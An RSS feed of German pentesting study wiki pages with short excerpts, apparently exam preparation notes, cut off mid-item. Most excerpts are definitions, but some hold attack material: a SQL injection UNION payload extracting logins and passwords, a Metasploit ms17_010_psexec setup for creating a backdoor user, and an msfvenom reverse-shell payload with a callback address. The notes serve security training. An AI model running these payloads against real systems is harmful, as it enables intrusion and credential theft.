<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.8" -->
<?xml-stylesheet href="http://creutz.spdns.de/lib/exe/css.php?s=feed" type="text/css"?>
<rdf:RDF
    xmlns="http://purl.org/rss/1.0/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel rdf:about="http://creutz.spdns.de/feed.php">
        <title>bash.history - edv:hacking:pentest</title>
        <description></description>
        <link>http://creutz.spdns.de/</link>
        <image rdf:resource="http://creutz.spdns.de/lib/exe/fetch.php/wiki:dokuwiki.svg" />
       <dc:date>2026-04-29T19:21:14+00:00</dc:date>
        <items>
            <rdf:Seq>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:analyse?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:antiforensik?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:armitage?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:burp?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:cloud?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:container?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:csrf?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:enum4linux?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:ettercap?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:googlehack?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:http_fehler?rev=1755287407&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:iot?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:john?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:kuerzel?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:ldap?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:lernen?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:linksammlung?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:netzwerkanalyse?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:nmap_uebung?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:nmap?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:passwoerter?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:pivot?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:portliste?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:postengagement?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:pruefung?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:responder?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:schnipsel?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:schwachstellenanalyse?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:sidebar?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:socialengineering?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:sql_injection?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:start?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:starvation?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:steganographie?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:tool_list?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:tools?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:uebung?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:weevely?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:wlan?rev=1755287408&amp;do=diff"/>
                <rdf:li rdf:resource="http://creutz.spdns.de/doku.php/edv:hacking:pentest:zap?rev=1755287408&amp;do=diff"/>
            </rdf:Seq>
        </items>
    </channel>
    <image rdf:about="http://creutz.spdns.de/lib/exe/fetch.php/wiki:dokuwiki.svg">
        <title>bash.history</title>
        <link>http://creutz.spdns.de/</link>
        <url>http://creutz.spdns.de/lib/exe/fetch.php/wiki:dokuwiki.svg</url>
    </image>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:analyse?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>analyse</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:analyse?rev=1755287408&amp;do=diff</link>
        <description>Analyse und Berichterstattung

Eine zentrale Komponente im Pentesting beschreibt der letzte Schritt des Pentest Standards. Dabei handelt es sich um die Berichterstattung, die sämtliche Funde dokumentiert und bewertet. Dabei gilt es, den Kontext des Gesamtkonzepts im Auge zu behalten. Zusätzlich erhalten Sie Vorschläge für mögliche Gegenmaßnahmen, mit denen sich die Schwachstellen beseitigen lassen.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:antiforensik?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>antiforensik</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:antiforensik?rev=1755287408&amp;do=diff</link>
        <description>Anti-Forensik

Forensik ist der Zweig der Informatik, der versucht, Hinweise auf Aktivitäten in Computern, digitalen Speichermedien und Netzwerken zu finden. Die meisten Hacking-Aktivitäten und -Tools hinterlassen direkte oder indirekte Beweise, die von einem forensischen Ermittler entdeckt werden können. Die folgende Tabelle fasst einige beliebte Cyber-Forensik-Tools zusammen.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:armitage?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>armitage</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:armitage?rev=1755287407&amp;do=diff</link>
        <description>armitage

start with: armitage (accept IP an Port) 

Next, you will connect to the victim’s system. To do this, click Hosts, select Nmap Scan and then select Quick Scan.



Insert Target-IP, press ok and wait for the end of the scan. You will see the Target in the upper screen
Next, you will prepare and launch the PsExec exploit. To do this, click Attacks and select Find Attacks.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:burp?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>burp</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:burp?rev=1755287407&amp;do=diff</link>
        <description>Burp Suite

Dies ist die deutsche Übersetzung der Seite: &lt;https://portswigger.net/burp/documentation/desktop/getting-started/download-and-install&gt;

----------

Burp bringt Fehler in Webseiten ans Licht. Als Java-basierter Proxy schaltet sich Burp zwischen Browser und Webserver und bietet ein praktisches GUI mit vielen Funktionen.

HTTP-Datenverkehr mit Burp Proxy abfangen</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:cloud?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>cloud</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:cloud?rev=1755287407&amp;do=diff</link>
        <description>Cloud Security

Grundlagen

Der Begriff Cloud steht als Kurzform für Cloud Computing. Eine Cloud besteht aus räumlich entfernt stationierten Servern, auf die über eine gesicherte und geschützte Internetverbindung von jedem beliebigen Ort aus jederzeit zugegriffen werden kann.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:container?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>container</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:container?rev=1755287407&amp;do=diff</link>
        <description>Container Security

	*  Linux Containers (LXC) ist ein verbreitetes Set von Tools, Templates, Libraries,... für Linux Container - linuxcontainers.org
	*  Docker ist eine Extension von LXC
	*  Eine High-level API ermöglicht eine Lightweight Virtualisierungs-Lösung</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:csrf?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>csrf</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:csrf?rev=1755287407&amp;do=diff</link>
        <description>Cross-Site Request Forgery

Cross-Site Request Forgery (kurz CSRF) ist seit etwa 2001 bekannt. Trotzdem kann man immer wieder feststellen, dass es nach wie vor Probleme gibt, sich tatsächlich vor CSRF zu schützen. Entweder wurde überhaupt kein CSRF-Schutz implementiert oder dieser weist Fehler auf, sodass er wirkungslos ist.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:enum4linux?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>enum4linux</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:enum4linux?rev=1755287408&amp;do=diff</link>
        <description>Enum4Linux
  Befehl    Beschreibung  enum4linux -v target-ip Verbose mode, shows the underlying commands being executed by enum4linuxenum4linux -a target-ip Do Everything, runs all options apart from dictionary based share name guessingenum4linux -U</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:ettercap?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>ettercap</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:ettercap?rev=1755287407&amp;do=diff</link>
        <description>Ettercap

	*  Tutorial
	*   DNS-Spoofing-Angriff mit Ettercap
	*  Use Ettercap to Intercept Passwords with ARP Spoofing
	*  Ettercap Cheat Sheet

to find the NICs that are in the promiscuous mode, type the following command.
ettercap -TQP search_promisc
ettercap -TQP search_promisc


-Q ~ super quiet, dont print user creds as they are found. only store them in profiles
-T ~ text only, only printf, is interactive, press h anytime
-P, --plugin &lt;plugin&gt; ~ run the selected plugin 
ettercap -P list
-…</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:googlehack?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>googlehack</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:googlehack?rev=1755287407&amp;do=diff</link>
        <description></description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:http_fehler?rev=1755287407&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:07+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>http_fehler</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:http_fehler?rev=1755287407&amp;do=diff</link>
        <description></description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:iot?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>iot</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:iot?rev=1755287408&amp;do=diff</link>
        <description>Internet of Things

Das Internet der Dinge (IdD) (auch: „Allesnetz“, englisch Internet of Things, Kurzform: IoT) ist ein Sammelbegriff für Technologien einer globalen Infrastruktur der Informationsgesellschaften, die es ermöglicht, physische und virtuelle Objekte miteinander zu vernetzen und sie durch Informations- und Kommunikationstechniken zusammenarbeiten zu lassen.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:john?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>john</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:john?rev=1755287408&amp;do=diff</link>
        <description>John the Ripper

John the Ripper ist ein Password-Crack-Programm, das beispielsweise per DES (Data Encryption Standard) verschlüsselte Passwörter entschlüsseln kann. (Linux und Unix Passwörter werden standardmäßig per DES verschlüsselt). Das Passwort darf allerdings maximal 8 Zeichen lang sein. Da die zum decrypten benötigte Zeitspanne stark von der Geschwindigkeit des Prozessors abhängt sollte man darauf achten, die für den verwendeten Prozessortyp optimierte Programmdatei zu verwenden. Im Unte…</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:kuerzel?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>kuerzel</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:kuerzel?rev=1755287408&amp;do=diff</link>
        <description>Abkürzungen

Hinweis: sort -dfb 



m’ order by 1-- -
m&#039; union all select 1,login,password,secret,5,6,7 from users -- -


Abkürzungen zum Lernen

&lt;https://www.memocard.ch/DE/Lernkarten/LernkartenInfo/Info/security-abkuerzungen-comptia/ba7d0f3d-ebb9-4f41-8ce0-decf6c406c8f&gt;</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:ldap?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>ldap</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:ldap?rev=1755287408&amp;do=diff</link>
        <description>Wie funktioniert LDAP

Der LDAP-Client greift über TCP/IP auf den LDAP-Server zu. Der LDAP-Server ist Teil eines LDAP-Gateways, in dem sich ein X.500-Client befindet, der über den OSI-Protokoll-Stack auf den X.500-Server zugreift.


Stand-alone-LDAP-Server</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:lernen?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>lernen</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:lernen?rev=1755287408&amp;do=diff</link>
        <description>Lernen auf die Prüfung

The HTTP status code messages can be in the following ranges:
- Messages in the 100 range are informational.
- Messages in the 200 range are related to successful transactions.
- Messages in the 300 range are related to HTTP redirections.
- Messages in the 400 range are related to client errors.
- Messages in the 500 range are related to server errors.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:linksammlung?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>linksammlung</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:linksammlung?rev=1755287408&amp;do=diff</link>
        <description>*  Public pentesting reports
	*  Comptia PentestPlus Exam Details
	*  Nmap
	*  Boson Labs
	*  Guide zum Keyboard Layout
	*  US Keyboard Layout
	*  Anleitung “NativeRDP in Practice Lab” (Workaround für Tastatur-Problem)
	*  CVSS Calculator 3.0
	*  Tools die bei der Prüfung erwähnt wurden
	*  Pentest Tool Liste
	*  Risikomatrix
	*  OWASP Risk Rating Methodology
	*  Wie sieht die realistische Arbeit eines Infrastruktur-Pentesters aus?
	*  Active Directory Security
	*  Sicherheitslücken dem BSI meld…</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:netzwerkanalyse?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>netzwerkanalyse</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:netzwerkanalyse?rev=1755287408&amp;do=diff</link>
        <description>Netzwerkanalyse

Richtlinie für Netzwerkscans

	*  OSINT oder andere anfängliche Informationen über das Targetnetzwerk nutzen, um die Start-Adresse des Scans zu bestimmen.
	*  Bestimmen Sie das Level an Detail, das Sie entdecken möchten. IP-Adressen, Ports, Services, Versionen, Hostnamen,</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:nmap_uebung?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>nmap_uebung</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:nmap_uebung?rev=1755287408&amp;do=diff</link>
        <description>Create a Backdoor User

Meterpreter zum Ziel starten

You will now use the PsExec exploit
use exploit/windows/smb/ms17_010_psexec
  set RHOST 192.168.0.5
  set SMBUser admin
  set SMBPass Passw0rd
run
User mit Berechtigung anlegen

Meterpreter ist gestartet, wir können beginnen</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:nmap?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>nmap</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:nmap?rev=1755287408&amp;do=diff</link>
        <description>nmap

In Matrix Reloaded scannt Trinity die Matrix mit folgendem Kommando: nmap -v -sS -O 10.2.2.2 So erfährt sie, das der ssh-Port offen ist. Anhand der eingesetzten ssh-Version, die ihr auch von Nmap angezeigt wird, sucht sie ein passendes Exploit.  Für den weiteren Angriff benutzt sie das fiktive Tool sshnuke und setzt das root-Passwort auf Z10N0101 (Sie sollten für sich selbst vielleicht ein besseres wählen). Danach deaktiviert sie mit dem Kommando disable grid nodes 21 - 48 wie gewünscht di…</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:passwoerter?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>passwoerter</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:passwoerter?rev=1755287408&amp;do=diff</link>
        <description>Passwort Hack

Es gibt verschiedene Methoden zum Knacken von Kennwörtern. Die wichtigsten sind:

	*  Brute-Force der Passwörter über das Netzwerk.
	*  Memory-Dump der aktuell im Speicher geladenen Anmeldeinformationen
	*  LSA-Secrets
	*  Benutzer-Hashes</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:pivot?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>pivot</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:pivot?rev=1755287408&amp;do=diff</link>
        <description>Pivoting

Ausnutzen entdeckter Schwachstellen

Lateral Movement with Named Pipes
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.3 lport=443 -f exe &gt; shell.exe  # erzeugt das Payload shell.exe
python -m SimpleHTTPServer  # startet einen mini-Webserver</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:portliste?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>portliste</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:portliste?rev=1755287408&amp;do=diff</link>
        <description>Die wichtigszen Ports
PortProtokoll20FTP (DATA)21FTP22SSH23Telnet25SMTP37TIME43WHOIS53DNS69TFTP (Trivial File Transfer)79Finger80WWW HTTP110POP3118SQL119NNTP123NTP137NETBIOS NAME SERVICE138NETBIOS DATAGRAMM SERVICE139NETBIOS SESSION SERVICE143IMAP161 162</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:postengagement?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>postengagement</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:postengagement?rev=1755287408&amp;do=diff</link>
        <description>Post-Engagement

Am Ende eines Pentest sollten alle Konten, die für die Zwecke der Bewertung erstellt wurden, deaktiviert und entfernt werden. Darüber hinaus sollten Firewall-Regeln und alle anderen Netzwerk- oder Systemänderungen auf ihren ursprünglichen Zustand zurückgesetzt werden.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:pruefung?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>pruefung</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:pruefung?rev=1755287408&amp;do=diff</link>
        <description>Prüfung

Teil 1 Projektarbeit

Scan-Ergebnis des Zielsystems:

	*  
	*  

Bericht

	*  

Zertifikatsprüfung</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:responder?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>responder</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:responder?rev=1755287408&amp;do=diff</link>
        <description>Responder.py

	*  &lt;https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/&gt;
	*  &lt;https://www.youtube.com/watch?v=qIsUCVvJ-3U&gt;
	*  &lt;https://www.kali.org/tools/responder/&gt;</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:schnipsel?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>schnipsel</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:schnipsel?rev=1755287408&amp;do=diff</link>
        <description>Script-Schnipsel

Stellt was auch immer in plab.txt steht vor ip.practicelabs und führt host aus  
for ip in $(cat plab.txt); do host $ip.practicelabs.com;done

Scannt das Netz von 1 bis 10 für 192.168.0.$ und schmeißt “not found” raus
for ip in $(seq 1 10);do host 192.168.0.$ip;done |grep -v “not found”</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:schwachstellenanalyse?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>schwachstellenanalyse</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:schwachstellenanalyse?rev=1755287408&amp;do=diff</link>
        <description>Schwachstellenanalyse

Nach der Identifikation von Target Hosts und -Services kann man beginnen nach Schwachstellen zu scannen

Vulnerability Scanner

Es gibt verschiedene Methoden, um Vulnerabilities zu erkennen. Ein üblicher Vulnerability Scanner</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:sidebar?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>sidebar</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:sidebar?rev=1755287408&amp;do=diff</link>
        <description>Zutück


Theorie

Schritte eines Pentest 


  * Planen und Dimensionieren 

  * Risikoabschätzung

  * Risikomatrix

  * Risk Management

  * Reconnaissance

  * Scanning

  * Gaining

  * Maintaining

  * Analysis and Reporting


Der Vertrag


  * Zusätzliche Dokumente

  * GANTT Charts

  * NDA 

  * SOW 

  * SLA 

  * technische Einschränkungen

  * Weitere Verträge

  * Weitere Vereinbarungen


Test Strategie


  * Black-box

  * White-box

  * Grey-box


Rechtliche Fragen


  * Internation…</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:socialengineering?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>socialengineering</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:socialengineering?rev=1755287408&amp;do=diff</link>
        <description>Social Engineering

Unter Social Engineering versteht man den Mensch als zentralen Angriffsvektor und Einfallstor des Täters, Hackers, Betrügers.

Ursprung des Begriffs Social Engineering

Der Begriff Social Engineering, auch bekannt als „Human Hacking“ oder „Social Hacking“ hatte ursprünglich, vor der heute eher negativ besetzten Bedeutung im Kontext der Informationssicherheit, auch einen Bedeutungshorizont im Kontext der Politikwissenschaften.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:sql_injection?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>sql_injection</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:sql_injection?rev=1755287408&amp;do=diff</link>
        <description>SQL Injection

SQL-Injection ist das Ausnutzen einer Sicherheitslücke in Zusammenhang mit SQL-Datenbanken. Die Sicherheitslücke entsteht durch einen Programmierfehler in einem Programm, das auf die Datenbank zugreift. Durch diesen Programmierfehler kann ein Angreifer Datenbankbefehle einschleusen und abhängig vom Einzelfall weitere Daten aus der Datenbank auslesen, Daten unberechtigt ändern oder löschen oder sogar die Kontrolle über den kompletten Datenbankserver übernehmen.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:start?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>start</title>
